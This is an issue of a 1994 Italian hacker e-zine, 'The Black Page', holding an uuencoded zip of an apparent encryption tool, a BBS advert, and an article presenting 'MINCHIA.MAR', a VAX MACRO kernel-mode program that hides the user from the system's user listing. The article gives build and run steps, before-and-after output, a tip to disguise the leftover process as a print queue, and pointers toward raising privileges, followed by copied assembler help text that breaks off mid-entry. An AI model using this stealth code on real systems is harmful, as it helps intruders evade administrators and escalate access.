M\LZ>1]@='OETUW-A(9S'-MJ;;$C[!,):MJRSF2/OYQ0^"D[SM+O37][,L)GAh M2[ZD[RLNT;+M*NL1J_"12=YVO:W<777UW;WB-/?6]UX0L.TNWA:JUK^YTVD1h M2[!&ET]Y+V-\B3KKK6]NC2R-C?9M7O+"]N-;WPXY&86FF3+V9I$7USK4:[,Qh MZ-=L$7E[?(V5O=:ZX>%X/5PM[F@CX<-U<+K`(/AOMA?6]]KM8C67-O,1K1M/h MO.^^;X;PJ78$5*%CJ7807B?(J_/^9^W&TMQWQ_?],F*0\H/-O"3EJG,)S3ZRh MYJ!B6[767(P1`#$A#8?J=7\QNKJ_FIO!1\&Y/;]/3U(S5555'?_-K+^EOZCLh MQZK*RHLZ/_4_)LUA_3^1M0,6/AL_I9F'S,V_VG[,VG5OUNM9h MO_J?LP[_[#86F_J<_R/B_17W6_;?,_.6&`G\I^W\W?[9/Y7]OX[U'_\?MDO)h ?Q@O.N$_Y(^\0??-'T%W5;-PEAFKB#[MVT,U,B:P[`/^#h `h end ExorCrypt MSdos version: -=) S.Encode v2.5 (=- begin 777 MScrypt.zip M4$L#!`H````&`%*WF6F[C95"R!T``/TM```+````35-C&4/`!(#h M)!4V)S@Y:GM,G6X?"08!$S3E]I;WFVKM'_`B0((`00(D#?#___$"`2*,NY'Zh M@.L];'M`@`H!RA7XK=G5@`_0T[*U$?!_P8"'K;J8/6ZY`-&G-&CUZG&C^IXCh M7A[QQHTZ#CW8+\&!?`T4.T&_(G$+%@@5/?.$@XD+7.S5X/^;N$4Y>R]G)S@3h M&/(1"UP[;FC2;>M=@>A]8&MBH_Y'`J]+$;>T=)^$K[@TM^3-$TA6>^HD0?03h MU&E^ZAR?NJ-11^]2E[ZU+@IV;A"]?P_1CBBK2_X'T.X>!XROHQW=J%W_V_6/h M&PKSC8V"@O[J!^@-6#U=C_^H'#0GU2]J3W_'E_=K<-%QRLM?[QP2V.L/2'=@h M^NL`(*2ZMY?-7=2M!?W_S_&\'[/'"E"17S=V"GJ@4_N+L\,\J/B`h MDNWLK>2MD-;7D+>AN:+C:O@](P+TBX%:<6LABI:((&Q\?81K#N::UG_@VM.Yh MO2(K,>O)6-/CK'G0@)"67CZ0:->/6XV7R=HB]C(Oh MV'LQ3>7K&Y3MN/>,P1$-V0F`B1[P)=QAAR\!3$5?(O6'^!*(CHI,RS?P)?"4h MKFGM!KY$$9GL>P%-.*9O6M>WKJ\(R1KW9$V/LN9JZ,F5[#S)TQTUZ8.3=F.@JSE(V;FZ9[E"V^,P%F#J.=:V"F1S#+h MYFA="'Q0#]6C=R*MZQU">E88S^[C6;]Z75R^ZW"`M&$V#\E3X%R!S4'^=G.$h M;=3"5]X/[!\@1+D#?1&OW_'UP,2='MP_%Z+%C^@["H`-!77V_YG$/YB\?YN)h M32(%0.Q$!G_CL0E.!X_4YFBA``?>3R2T,QZ^TOO][;25G&^3LY/_;h M8\'<4`^N?";T\U4M[<$'=':L?I+L/\YL_]^FMLW;)K9AMZ:HL]XG]OT!#L>Eh MU(ZQXUIXVSQNT"C`L@5.U:SO'$#+$[09V*=9@=:MUSV(%:K-_Q;5`'I2LN.-h M%)F/WI48`ZQQ?&*/IX+:8&J`#C\X7U)W6@+1F?UBAW8%CG?IV`!3FQCS+`$6h M-XA7(&/M,[<-O4[[`]^F_!K1!/1]JWU6W5?FNZV9<7]Z@QP-A?_^W<("L,4=F[0_7#HA4h MM?A[0&JQN,53h M??(2UG\$[),<^70;>@1=SDQ;-)?%IG7XSOMS%3Y]NKCA>/O_HZ^7YZP.![\Gh MN+C@PJ("ZQ>QW^V`!HK&OH<5HH_>FFT`(CGL7INW<`09^I>4!@:`DQX?U'CR;Vh MR1W`%FKV^]$71_^EO^_``!T1CK/F"9+N?IX)Z=[GV9#N6P5H>NU1)]**3MK)h M23L7:Z71<\S0X>_#9XM/3UEQ0OJN+L!UX_&OT<\4(!B_>_4OQBXJ-D^\78h M!^[CK`;SGT.'%K=1UZQ537U=?6^Y#;C$],/RJNJ"KS/*_P4`[@/7YX4DS_[Bh MV[C]FE,NQBGWLK>?<$I5_05M$#87VGQ]M.*@ZO@YS8M@OIB0N8MY5P'NM^8Ih M(]#)2D_\7]HY,<&>#7Q<^B'X@_L0M=3[=Vh M[(WW3SI^8F">.X=\UHG]`BQ:!$FT^/:)G82:=^D]:=M&6NHOMDK0-U."K7<*h M,WN@ENDRO"15J<]V\_7K+3TR%RX`*[V"RGWTE_]S+`;$^W>W3LL0=.1\\X^Z(Q^\KE`X,[h MNJVQ1;)BE0N1)'PDJNR5%[N(/Z"%X;`_GI[K?KD3SBXMG8M/=L8($(LR/S!Rh M$RS_GXE9-GMTB_-P496X0O)U1X"IPGZ@W`9H?,[P(.46A%UP_4'(/"<\QK`Gh M[@I(7\<\>E;ZBHFOOZ=D'\R>X%6KOA$&7/DOY;E](K@P7-U*2JDF*Q!3_>A@h MXPASV@01R)L3:J]?SD3$+R!\\@X7PV."6DG2!IBD^@6L7!T(>26P6L`AG7,#h M6?=R1B"0+%R`5$A4>-`.99ZXJGE?C$_9GE[-2'8"9&/]-(*K'&*`]PT`;>!'h M\N?XG!T*/*_!+]GCJT.`WCY3+BSH1>39_%M<.3):21]Y='!@;/@"K95.,#)Sh M`\4&Y@_PR=,C!G!G,=4-`F9J$.3Z=L4>X*3O'_#)?=7.L*[(Q=X#KS.:[U\\h M//KX@=B&MW_HZ&SS!$-=.8[_[*MW+W^A]FQ`h MWH#2+*[U(1GH^)`,KV`O8;+N!_!L-7X&SR(V7P?26G:!@,D:?+>%GC(A%ECSh MRS+_D64@F_B80Q#:BL=0O('B441GDET_^KX4VFQ.3F.'YSD#4#:B'0''C6B@h MTBE0\US)EX"6',B6)*\`XDB:I/_]3KQ")GM:QS\(?,Y_O88$OU=]]=W<6O4'h MA<"AG#54J%/1\V:0$GPQEXOJ!!$?7'\14BK:Y\62C*`*_Z;XR1Q,3D0[@!'Gh M!/YDO0<7>/\W@/AFW>`!DW![$,X;P@S/^/!1`F7PAX"?/+G"]V-IQ=W;AFW1h M=KGN'PBX85-"6?6+Y\&^'CA7`'%`*HB#_!L=/HBY9YC4'V4/'#;%O.<=XBD\h M^?3-1C?0#(>=?\!<0J_8BIS_T.0'.-O9O[OR"0.NIP_Y_K&FB\*!GQ4_^+Q_h MV8`2W`:4=L`_^K>Y,#E=&5/KBN6U]Q1#_,2>=-*OH*1^6DK8`7PLX_72(36Sh MTWUE\O7&(4D[X/6_$9$=)V?F20>$LBH\_0(W<7UGOD^;=M,FYX^H#X&):2[0h M50*;@]EQ3'*P,^<"F>Z9G">R!-=W'REM+#7A"=Q9"2@MM2><5T3?'^UZ!M[3h M.BC2_;WY]0PA$2XGT>P"`>@NJST@$D#[=0)CO_X.SH&/BY#4('(C+C7PB`]`h M:"U@!O<6%]#Y@<&(?O$A^A,U!LWOWNY0LPLT?C!"8`G)D,^#ROP-;!XP&47Ih M]F"$VS\(D:X6R-@"'Q\S-\B(3:]/K2^R>h M^^M7#OU((/UD@GY-T"^G!#=$"O1Z]0V2'+"BKWM$,P%I!FM](AFH/+U?CE!Dh M%2DIMMR``!9D?:#7]5>CA2FLT%@FPAR0H9BOVP-5WMBP9_^C=0!RD_#1+(J=h MX&@0$6&#-@NHX&Z01K&G.T`&S+/$9SJRPML@SH(!#,]'HRPXFH3P,H0W(3P,h MX5T(+T(X'O5H%?D.M""(W9UO0)AU>1IA5ABZ_XS_5_2:&Z@/.O4PST4T2A"Wh MZ`1"T16V84?]^@?%_;\^P?4MZT93[NB-*B:(B&Z+/O,=!GV[-GFB(!]GCQ$2T<#G$J9U`QHI3OF-h MZ2T*T!;)]G''"N'X;<>*X/AI27MBPYS]]RPR]`I[=%ZSP%[P1'Y"M:8'63O(h M1=N:QGHZ")C_#=ASS';']PS`[%*8+\&L0`.FSQ(!)[?X_A,D>DWPCZ&$4*D2h M@6G2\(,L;.2E9P:[=R\"=Q]JL#'XH47?@Q^V?R3WLW:]`1B^WHFZH):A1_>@h M1UL@6C&^)N9RX;CD4S`,D.Z+9%^5240VLL9Y0h M'6W9YD@GH)_'Y*N$NW:!'!3$4UW`NU'!QE+<$.+V?*NMN'4D^[J`(9S9@)BNh MB'^*D$OZ%L>/NH\7".%=[Q<\;_W+,.LQYC'@_SC!QQH^LW0CZ"0`FO4]C+Y-ILX#1O*X*ONN_+PFA!.Z-9>R-L%N,V9]A/E@Zh MP/O:EJ;`'A\6#8-P?&?'LD;G$9G`B9W/X-A;8_`M\0X6;7IC!Y2V<,H^^!)0/^_]AX"X;KJP:(JA+NT%E.9T/C`#*MZ,]%7`[*ML`;(DOQ`>PA4-%2I%h M7^*'9D$YCI\100M)/'UD`%,$J:9L5=\4Z8J0F(BBAXNG^N3X^K0^H\:-HK1.h ML#HRZ.-^*>"4I/?Z4]"YV1`@7F9VN"$_I%8WN=.X7h M@H$;LA%J9)V8WJWX2G^VS41V>MJ#88B.=GW"XT?_AMD-1!:E[0,#H!FU\2DNh M,XJK9P2W8C^BP0T+IB\`9([(,$0)]D8A:@.S7&9J`U%FTI0HNPU.=QO)";X9h MK\/8"G^+5I#H"M:YA-AC"4#:W"(6,,K@TA*(IK!)+MAL3([@\JDPX!.!V,1%]\\_]!1"G1UR^$/.6B:L1ZF-"!2.E_h M-<]:SXS;+0N9Z"M!DTDXMJUP^QF`>_G;4-IM&.;HL].[YP3NI=(-8;L%L_'Mh MH+Y?_,-L+V"V(G,FX:ZGD/6`H<)FDA))N3W=`W_CRX#h M6^EV`!NG=DXYR]EH:6>C$9P-[L++$6VCV^NJ/L037YL6QY'*]17!17ZU);K;h MYO].=AV28-(!GZ@>C8%BZP2-0S-DE96?]H?O_YWBDV:DE8/R`[E'9V`L)A$*h M>_1?`1`MS$PV5@L@:=I$YIYJ7\Q99KN^4K8!JG0BM:GG3+G'L4[V[OXB!]V@h M5JC^U_J['!3/9+%O$39),*[M.J)M2QW/9"Y3-I,PO&$_B*,6EL%]/H'L\h MW7Z^7SJK*4@#(IZ9>95U'U@&_]$8K!9'"DG/TBT'9R,9.>9A\JU!?,Z_,'/,h MMFE.S[8R*+G+6<8"'#U<\`.*?2#RP>EA+LYOY%URIG7PA_N1?O]=(6.h MQ0(\[MNF0,5.3,DA>0RYF>O`L-LS;"E`P)W;9+M#$#",#JYKH8!B/=I.'#>6h MDRI)&_N8:DP%]IW!ZV[3)\),U>T[/0*S`5K3`!.N5WF/\TKS=)&PL80Y78TSh MDR^.QO9"7H#E+KE>`8]PAP,>[!.M(LR+8GV+^=?;4(16861\`>.F37A*$B)!h M*<.8M*_'EES`W2D"REPAK:*ES9\"H.Z?#H(K;UKF?T2KH!!C&B83S@%T\`-"h M4!&'FF[?8(\%O,R.V@']3Z#%Q9"GW:/_N1*J4V6_'QQ@`('CH0'F3S_Z_21;h M6,3*9R?<];1]B$?W$=>CL[\?1AL@D>;M"T-R'O1.^0.UA_1`Y+TZ@+4-[!S.h M'5,/>%SC\K2!D)_^-X!\.=OF'Q*7GX74;GS7_BFH%E"R]#/`7"36Q$S?S]X(h MDJ;]`SG5]`J?\G\-D)=TVX335)R8GCE:2$@9R'.$Z$D#J'@CJ#K2*\L5<0-4h M*^!P8G*"M'E0V<"^N_M)W+`PG!(X1:)7JTWX+4=R#^'RN($PTQO3%_2N@4D([h MXD=,B$:&>"(?H1RZEL<:^LA@0!Y5GZW;`H7H/-Q@/L]3M#.!1=G'AT&`9<"Oh M-;!/LP*M6QL4MX@&O>M8W[BD<^8J?1_B\L=OQ+[NMWJ%]):_Z%)'/KXD+;[Fh MJ0#&VMY.D+5.8I,V#R)^H%DPM9EUP:/BU_54%_[5"T>Y_>#\`4AX8Y_N^O7Fh MF!;!'X/E\_O"01B>(8&42QVVPO4LTEC'#!H?M@5#53O3=#_@@?H=B4#,#:;Th M!V$W(,O76R)62M&R6*_W#2#-'$&:\0-HMLW]:#LNP^``]`+4-]"7LOV;EVDWh M2+O'@S-NR1!+^;&:D3F=M5E\9%(J62W?=5VEZ*T#[(D:H%TD2U3NNLQ\CYH9h M[:\;D(Q=_&)J[5L\H.ZLR.P,=^ZS:]7BZ:,GL>F+*:OF5-DS`E0U=*!D"6+Th M#JH7=VFOM[K>*&[^_]'W3@]U:A1(?:7R\1#JLMM5N0U\Q/[R[`:S;L52]<,$h MLA6!>\`3O>`$9&A\(+Y"Z_"=XWH#L>HKKV^(YI3OG!;h M;?I3?R$+?76WCU7LHWD*-(TK%4<_Q[`OP'[F]22!DK`@RGXT4(&6C]V<2,'&h M"'#W9U@GMDE$<9T@8^R.@0F@_N54>'KG`(/2U4=;)GF[GW.XWQ7(OY6(C@2;h MKE`DC/P<$#GT@?!;-3O-@<(@:'LQS7(^>G/?1?&!^1,S*?/!D2:JF;:\O^5^h M><;:&4??&V./2+)ZYOK>7VU@2\W<7RG,=289$"@h M0#&C]R(;[K^)`#\'B.N6G3I=GVG>C#J8T9L<550DP7SHH.3#(/\B5-8!*?:Dh M08/J_O_7Y$Z+3@50M*.KBQ`>?*!QN16.JO2_+WVDL`XQ>@9.'(%RVEXN_ZS#h MI49%WT'K"$1XY8,_4)X1*:)>;'WE=:6)J_K'FE7K\*E09TKW*%4JE)SO4`U^h M1/\0P(@6C/!'K5M0[872AP,X`\N)]FK7Q?D;*8!:*!)M))@Q^BR/]MI(+L?3[S1(I>N0TWH_3Wh M\TQ(]SZ4@U$3YKEBHA1]SKL?6<*4NS'Z^.C2%R^S[UB&A>XG7A\PP$HJC87]h M2:W0(%CJMRIM@*)/D*YZXP4!A-#JH>'/3Y.,U-Q=1=H@W?3_YC2>h MK6KP$_@(501_=A#@+6B9^5#LH$L6S6`L\*\!AJ%],K2)M06CIJN8B+V5O;O&h MN@4I=09CE9%'!S\PV/`%>C?KV0,F:_`=OPNF&\7>5F,)5CW$1XNG;C!"QTCKh MDAY`].W;11NY?2QQ#U*V4RHQ.>$8PG;=!83O;:X-P/^#68:9C:X=NSX4@-L/h M$&\]=9&+O0=>AS??Q_/*8E-L.#*5=VF?X.K3J\L!9)*=O?T#?QZ!3:)/[JL=h MJ9$.Q6M5XK68M3V=-CZR35$+6T.EQ4MT#+N@N[`G`,`$9SKA`*OCF4IW>TX7h M8$:^47N`/1W1*X(H"48I;*:^!/FZ0_H<6)[OV+\%<_QOEXLH:&VD=WMK:VL>KW_H+RKCDJXZST@207;3_S%*A')&:^0]H\.EEA1%75Z5=ISL/@K6."-<@QRVID_*6&D%_H(@#W:>G5D<=&\#MZ9OO%:/]#>C:T:U(-H;^Dh M=..<[?UU>LL`(97-!UB2RA,;7<=P\:GH,YV0CN`)FN()2J+KY0^@2O$1I=!$h M?WE'(7=>.TJ@Q]$$.">=Y5_N#/+BPZH#Q(WX/3,`;&O+ZQ1JGP'MB,PBY/HBh MY/S^"-F(C6ENQ('1_1LO:E#(IWKB(L(UX2)^^(^UX>T&#JC['(;M[O#_-T'5h M%Q``+^[X3R-^H`'V*SJP#C1W@QD)B_VU@J#-Y0ME?^5CS'^R`HZ=`GX^)^]`h M#^=5"+NEZOO;2HFA@B4!W'"V"[P??Y)PJ?#I!&&@XG8%$CRI>K'PAA;">609O#\VP!Z^C87NIUZ7$[h M_/MF%4;2@/V^^8'1Y33$Q+][@,9TAPG:N;6&WO(36.#:9(&1YEORS(4CV$IVh M6/425%-G&KD0C:WCM*EC1^8L43_@F,7A://HJ5><#/`0F@PBAB;#+9D+4_YIh MWB&Z$90!&QF497@$3D8N<+*\Q,;\1JL*BB=0O`&ALS+^=4M8-(!@=-.I(*76h M==N2:MJV94$R32M6;EBY>4&V!#GT+=R\14L7),JQ*4'&S(DS)TN03=..h ME?MV[ELSTW4O%RZ$?A;Y#>]6@--PP8`#L*CO'/K5:%*F1;\F=6KTR3E@4P08h M.'#@@`&V@04WE0^)AH8B9[60T%AN5H7``Rh M*6#*).$!SR2!,0.^(!A`@,J^"#B#8``+*DDD2K=UV;)-88ROT+Q'N`,+PICFh M:2`8P\;1$@@6>)#A)BR*QW`?TKK#>=SMQG0)$Z28VQUI6KIMP[H%F91N6#:6h M6F$^A94NJA-DR;D@>29U"[>.^6;3LBWK@SG2F$XS,Yh MRWF?+AK$/LT[2CG_W;X1VZ0^+1GS[Y3#OD$:80ZN''8,V.8-?@Y8TV&LLD?#h M6H,L4V3?VK7GGNK0ZOZ29(9]+DL%Q:S9^^YH!\'Z+L,R#P1E*W80^Q*Qh M)I1CC#9%NE53Q8D[`*/-CX/XFE8I=DNT)h M$V])O"E#&#M,F"G:2;EE%LYRW:(4\\S[#)N9=Y-G@UO+DA&"S=FB=8XT1.O/h MTXFO?=2GC^2EVF!ZF`T5=%YL]K%KLKC=LG+-LGU[)WJ``[;YC&T).OW/8`^2h M;%J[::9HL&_R5@`&SG.`BQBU#/%U;K6CAW-TXIM](R=WTQX3=N,I]=?N_`$0h MFVTL1U:=.X>5$QM+J/\'4$L!`@H!"@````8`4K>9:;N-E4+('0``_2T```L`h M`````````````````````$U38W)Y<'0N97AE4$L%!@`````!``$`.0```/$=h $``````#!h `h end -=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=- [ N.d.r. Complimenti a Hit per il suo ottimo articolo !!! Speriamo che presto la ns magazine possa diventare sempre piu' tecnica e con piu collaboratori !!! Per comunicazioni con Hitman Italy probabilmente seguira' un suo nuovo indirizzo Internet. Per informazioni contattate la ns redazione al nostro indirizzi Internet :) ] ----------------------------------------------------------------- PUBBLICITA' REGRESSO ==================== CYBERPUNK E VIDEOTEL SU ARKIMEDE Nua : 2551604400 Videotel : *52181# Piu' di 20 aree messaggi, incluse aree sul Cyberpunk !!!!! ---------------------------------------------------------- Per contattare la NS Redazione su Arkimede potete scrivere in CPE su ARKIMEDE alla casella "Dupree's". ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 5 Per la serie: Vax, Assembler ed esaurimento nervoso : --------------------------------------- Presentiamo : MINCHIA !!! =========== Allora, premesso che NON sono un esperto di Assembler Vax, premesso che cio' che so e' 1000 volte meno di quello che sa tanta altra brava gente che sta a chiamare VAX dalla mattina alla sera, premesso tutto quello che volete voi, mo' provo a scrivere qualche cazzata riguardo a ... boh, leggete e se vi piace, eiaculate :) Questo e' un programmillo molto carino, si tratta di un INVI che pero' risulta essere molto piccino, facile quindi da mandare su un vaxillo e immediatamente compilabile. Ne esiste uno gia' disponibile, scritto dalla stessa DIGITAL, col nome "INVI.MAR" ma questo qui e' carinissimo perche' e' molto piu' piccolo dell'altro. Scusate se scrivo in questo modo, non sono frocio, ve lo assicuro, e' solo che sono le 5 e mezza del mattino e mi sento un po' rincoglionito. Sono riuscito a fare sto programmino sbattendomi qua' e la' tra listati MAR, files presi da PHRACK o simili, e cose del genere. Alla fine ce so' riuscito ! (grazie anche all'aiuto di 1 persona che resta sempre nel mio cuore (informatico) e che qui ringrazio pubblicamente : GRAZIE PIERGIORGIO! senza il quale non avrei avuto lo stimolo per imparare certe cose stupende e meravigliose che popolano il ns cyberspazio cosi' martoriato da intemperie legali .. basta va, sto sparando cazzate :)) Chiamero' questo programmino "MINCHIA.MAR" perche', quando lo lancerete, esclamerete per l' appunto : "Minchia!!!" :) ----------------------------------INIZIO ----------------------------------- .title "Minchia !!!" .library /SYS$LIBRARY:LIB.MLB/ .link /SYS$SYSTEM:SYS.STB/ $pcbdef .entry Minchia,^m<> $cmkrnl_s routin=Sucamela ret .entry Sucamela,^m<> tstl pcb$l_owner(r4) bneq VaiACagare bbcc #pcb$v_inter,pcb$l_sts(r4),VaiACagare clrb pcb$t_terminal(r4) decw g^sys$gw_ijobcnt bisl #pcb$m_noacnt,pcb$l_sts(r4) VaiACagare: movl #ss$_normal,r0 ret .end Minchia ---------------------------------- FINE ----------------------------------- Mamma mia, speriamo sia giusto se no finisce a figura di merda :) ("Figur'immierda" come dicono alcuni miei amici calabresi) A parte gli scherzi, lo e'. Per mandarlo su un vaxillo fate semplicemente un miserando $ CREATE MINCHIA.MAR Dopodiche' mandate il programmillo in ASCII, e alla fine della trasmissione premete CTRL-Z. Cosi' avrete il sorgente pronto per essere compilato coi seguenti schifosissimi comandi : $ MACRO MINCHIA $ LINK/NOMAP MINCHIA (il /NOMAP non e' proprio "necessario" se non ricordo male, pero' fa scena quindi ce lo metto :) provate un po' voi, CON e SENZA :)) A questo punto avrete generato il programmino MINCHIA.EXE, se lo lanciate otterrete qualcosa di carino. Esempio per deficenti : Supponiamo di avere un utenza "COGLIONAZZO" su un vaxillo. Compiliamo MINCHIA.EXE e poi facciamo : ---------------- : $ SH U/F VAX/VMS User Processes at 25-AUG-1994 05:50:59.73 Total number of users = 6, number of processes = 9 Username Process Name PID Terminal ANALGAME ANALGAME 00002760 LTA4574: COITUS COITUS 00001526 LTA4239: COITUS _LTA4342: 00001A50 LTA4342: COGLIONAZ COGLIONAZ 00002992 LTA4384: <<<<<<------- NOI *:] POMPINO POMPINO 0000154F RTA9: (INGOIO::SMEGMA) SPERM SPERM 00002826 LTA4602: (DSV069/ORGASMATRON) SPERM SPERM_ 00002827 (subprocess of 00002826) SYSTEM BATCH_20 00002922 (batch) SYSTEM SYSTEM 00002734 LTA4559: (DSV913-FISTFUCK_2) ----- ora facciamo $ Run MINCHIA.EXE $ ----- e adesso :) $ SH U/F VAX/VMS User Processes at 25-AUG-1994 05:50:59.73 Total number of users = 5, number of processes = 9 Username Process Name PID Terminal ANALGAME ANALGAME 00002760 LTA4574: COITUS COITUS 00001526 LTA4239: COITUS _LTA4342: 00001A50 LTA4342: POMPINO POMPINO 0000154F RTA9: (INGOIO::SMEGMA) SPERM SPERM 00002826 LTA4602: (DSV069-9.P/P4-ORGASM.) SPERM SPERM_ 00002827 (subprocess of 00002826) SYSTEM BATCH_20 00002922 (batch) SYSTEM SYSTEM 00002734 LTA4559: (DSV913-FISTFUCK_2) Minchia ! (ecco perche' l'ho chiamato cosi' :)))) siamo spariti dall'elenco utenti !!! Adesso con questo esempio da coglioni avete capito come fare :) (almeno si spera) Certo, nell'elenco dei processi rimarra' il vostro processo base. Conviene allora rinominarlo con un nome che non dia nell'occhio tipo una coda di stampa : $ SET PROC /NAME=SYMBIONT_0002 a seconda di quali code di stampa gia' esistono. Se volete scoprire un utente che e' "MINCHIAto", provate a esaminare i processi di sistema, a verificare le devices LTA con SH DEV LTA per esempio (o altri devices) eccetera ... NOTA : E' possibile inserire del codice per poter modificare questo semplice programmino e fargli fare cose piu' carine, come ad esempio ottenere privilegi superiori. Per fare cio' si deve scrivere in una tabella di simboli particolare (ovviamente in Assembler) che e' questa qua : Nome simbolico Locazione Uso Riferimento a ------------------------------------------------------------------------------ CTL$GQ_PROCPRIV!P1 Pointer page !permanently enabled privs !SET UIC PHD$Q_AUTHPRIV !process header !procs allowable privs !$setprv KFI$Q_PROCPRIV !priv install image!image installed with privs !image actvatr IHD$Q_PRIVREQS !image header !unused - set for all privs! !image actvatr PHD$Q_IMAGPRIV !process header !mask for enhanced priv images!$setprv UAF$Q_PRIV !sysuaf.dat !UAF allowable privs !LOGINOUT PHD$Q_PRIVMSK !process header !working privilege mask !system srvc's PCB$Q_PRIV !PCB !same as phd$q_privmsk !device driver ------------------------------------------------------------------------------ Leggo proprio ora alcune fotocopie del "VAX/VMS internals and data structures" manual : ------ If a process wishes a privilege that is not in its authorized list, one of two conditions must hold or the requested privilege is not granted. 1)The process must have SETPRV privilege. A process with this privilege can acquire any other privilege with either the set privilege system service or DCL command SET PROCESS/PRIVILEGES. 2)The system service was called from executive or kernal mode. This mechanism is an escape that allows either VMS or user-written system services to acquire whatever privileges they need without regard for whether the calling process has SETPRV privilege. Such procedures must disable privileges granted in this fashion as part of their return path. ------ E' altresi' necessario linkare la tabella dei simboli di sistema al nostro file oggetto. Di solito e' SYS$SYSTEM:SYS.STB. COL CAZZO CHE VI DICO COME SI FA ! :) Se siete bravi e avete a disposizione un vax vostro su cui sperimentare, fate delle prove coll' assembler dei Vax... Vabbe', visto che insistete, ecco qui qualche stronzata di HELP sull'assembler vax. Non ho fatto altro che prendere alcuni HELP online. ---------------------------------------------------------------------- MACRO Parameters file-spec[,...] Specifies one or more VAX MACRO assembly language source files to be assembled. If you do not specify a file type for an input file, the assembler uses the default file type of MAR. You can specify more than one input file. If you separate the file specifications with commas, each file is assembled separately. If you separate the file specifications with plus signs, the files are concatenated and assembled as a single input file, producing single object and listing files. If a file already exists with the same name as the object or listing file produced by the command, a new file with a version number one higher than the previously existing file will be created. No wildcard characters are allowed in the file specifications. MACRO Qualifiers /ANALYSIS_DATA /ANALYSIS_DATA[=file-spec] /NOANALYSIS_DATA (default) Creates a file containing source code analysis information. If the file-spec is omitted, the default file name is the same as the source program; the default file type is ANA. The analysis file is reserved for use with Digital layered products, such as, but not limited to, the VAX Source Code Analyzer. /CROSS_REFERENCE /CROSS_REFERENCE[=(function[,...])] /NOCROSS_REFERENCE (default) Controls whether a cross-reference listing is included in the listing file. A cross-reference listing is a list of the places in the source file where the item specified is defined or referred to. The /CROSS_REFERENCE qualifier includes a cross-reference listing, and therefore requires that you specify the /LIST qualifier to produce a listing file. The /NOCROSS_REFERENCE qualifier excludes the cross-reference listing. You can specify one or more of the functions listed below. If you specify /CROSS_REFERENCE without any functions, it is equivalent to /CROSS_REFERENCE=(MACROS,SYMBOLS). ALL Cross-references directives, macros, operation codes, registers, and symbols DIRECTIVES Cross-references directives MACROS Cross-references macros OPCODES Cross-references operation codes REGISTERS Cross-references registers SYMBOLS Cross-references symbols If you specify more than one function, separate them by commas and enclose the list in parentheses. /DEBUG /DEBUG[=option] /NODEBUG (default) Controls whether local symbols are included in the symbol table, and whether traceback information is included in the object module. You can use these qualifiers in place of the /ENABLE and /DISABLE qualifiers, when the DEBUG and TRACEBACK functions are used. The /DEBUG or /NODEBUG qualifiers will override debugging characteristics set with the .ENABLE or .DISABLE assembler directives. You can specify one or more of the functions listed below. If you specify /DEBUG without any functions, it is equivalent to /DEBUG=ALL. ALL All local symbols are included in the symbol table, and all traceback information is provided in the object module for the debugger. Specifying this qualifier is equivalent to specifying the qualifier /ENABLE=(DEBUG,TRACEBACK). NONE No local symbols and no traceback information are made available to the debugger in the object module. Specifying this qualifier is equivalent to specifying the qualifier /DISABLE=(DEBUG,TRACEBACK). SYMBOLS All local symbols are made available to the debugger in the object module. No traceback information is made available to the debugger. Specifying this qualifier is equivalent to specifying the qualifiers /ENABLE=DEBUG and /DISABLE=TRACEBACK. TRACEBACK Traceback information is made available to the debugger in the object module. No local symbols are made available to the debugger. Specifying this qualifier is equivalent to specifying the qualifiers /ENABLE=TRACEBACK and /DISABLE=DEBUG. /DIAGNOSTICS /DIAGNOSTICS[=file-spec] /NODIAGNOSTICS (default) Creates a file containing compiler messages and diagnostic information. If the file-spec is omitted, the default file name is the same as the source program; the default file type is DIA. The diagnostics file is reserved for use with Digital layered products, such as, but not limited to, the VAX Language Sensitive Editor. /DISABLE /DISABLE=(function[,...]) /NODISABLE Provides initial settings for the functions controlled by the assembler directive .DISABLE. See /ENABLE for a list of these functions. The default is /DISABLE=(ABSOLUTE,DEBUG,TRUNCATION). If you specify more than one function, separate them by commas and enclose the list in parentheses. The /NODISABLE qualifier has the same effect as not specifying the /DISABLE qualifier, or negates the effects of any /DISABLE qualifiers specified earlier on the command line. /ENABLE /ENABLE=(function[,...]) /NOENABLE Provides initial settings for the functions controlled by the assembler directive .ENABLE. You must specify at least one of the functions listed below. You can enable or disable: ABSOLUTE Assembly of relative addresses as absolute addresses DEBUG Inclusion of local symbol table information in the object file for use with the debugger TRUNCATION Truncation of floating-point numbers (if truncation is disabled, numbers are rounded) GLOBAL Assumption that undefined symbols in the assembly are external symbols SUPPRESSION Suppression of the listing of unreferenced symbols in the symbol table TRACEBACK Provision of information to the debugger traceback mechanism The default is /ENABLE=(GLOBAL,TRACEBACK,SUPPRESSION). If you specify more than one function, separate them by commas and enclose the list in parentheses. The /NOENABLE qualifier has the same effect as not specifying the /ENABLE qualifier, or negates the effects of any /ENABLE qualifiers specified earlier on the command line. /LIBRARY /LIBRARY /NOLIBRARY Positional qualifier. The /LIBRARY qualifier cannot be used with the /UPDATE qualifier. The /LIBRARY qualifier requires that the associated input file be a macro library. If you do not specify a file type, the assembler uses the default file type of MLB. The maximum number of libraries that can be searched in any given assembly is 16, one of which is always STARLET.MLB. If you specify more than one macro library in an assembly, the libraries are searched in reverse order of their specification. When a macro call is issued in a source program, any libraries specified with the .LIBRARY directive are searched first, in the reverse order in which they were declared; if the macro definition is not found in any of the libraries specified with the .LIBRARY directive, any libraries specified in the DCL MACRO command line are then searched (again, in the reverse order in which they were specified); finally, if the macro definition is not found in the libraries specified in the command line, STARLET.MLB is searched. The /NOLIBRARY qualifier has the same effect as not specifying the /LIBRARY qualifier, or negates the effects of any /LIBRARY qualifiers specified earlier on the command line. /LIST /LIST[=file-spec] /NOLIST Controls whether an output listing is created, and optionally provides an output file specification for the listing file. If you issue the MACRO command interactively, the assembler, by default, does not create a listing file. When /NOLIST is present, either explicitly or by default, errors are reported on the current output device. If you execute the MACRO command in a batch job, /LIST is the default. When you specify /LIST, you can control the defaults applied to the output file specification by the placement of the qualifier in the command. See the VMS DCL Concepts Manual for more information on entering output file qualifiers. The default file type provided for listing files is LIS. No wildcard characters are allowed in the file specification. /OBJECT /OBJECT[=file-spec] /NOOBJECT Controls whether an object module is created by the assembler. It also defines the file specification for the file. By default, the assembler creates an object module with the same file name as the first input file. The default file type for object files is OBJ. When you specify /OBJECT, you can control the defaults applied to the output file specification by the placement of the qualifier in the command. See the VMS DCL Concepts Manual for more information on entering output file qualifiers. No wildcard characters are allowed in the file specification. /SHOW 